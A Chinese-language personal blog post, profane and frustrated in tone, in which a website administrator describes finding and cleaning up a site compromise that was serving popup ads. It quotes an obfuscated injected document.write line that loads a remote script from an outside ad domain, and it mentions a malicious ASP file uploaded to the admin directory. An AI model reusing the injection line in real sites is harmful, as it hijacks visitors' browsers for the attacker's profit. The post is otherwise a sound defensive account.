嘛原因呢？

检查JS和CSS文件，没有任何问题呀，代码基本上都是正规的，少爷这郁闷呀。

Topik考试破在眉睫，IPC的采购也是瞎TMD忙,遂没放在心上.

晚上，蝴蝶叫我，你那个弹得太猛了，这多窗口。

不行，爷生气了，非要他妈找出来，1万多IP，不能都送给黑客赚钱呀，一天也他妈几十块了，自己没弹，他倒美了。

有木有，伤不起。

拿出武器: firebug检查网站JS来源网站,Beyond Compare检查篡改文件.

终于把这个挨千刀的找出来了，NMD ad.zom123.net挂马。

在问候了他的母亲和奶奶后，修复工作开始。

1. 躲藏在Search. 多了:document.write('<\x73cr'+'ipt src=http://\x61d.'+'\x7Aom'+'12'+'\x33'+'.net'+'/ip.'+'asp?loc'+'=tianjin><\/scr'+'ipt>');

我干,代码被翻译了，我再日，还你妈屏蔽了管理员所在地区IP,太牛了

2. 找母鸡. 奶奶的admin 目录下，上传了一个漏洞asp,删除. 取消写入权限.

折腾完毕，代理测试一下，Okay了.

唉，白白送给孙子很多压岁钱，郁闷。

附图一张,大家以后可以参考检查JS恶意代码: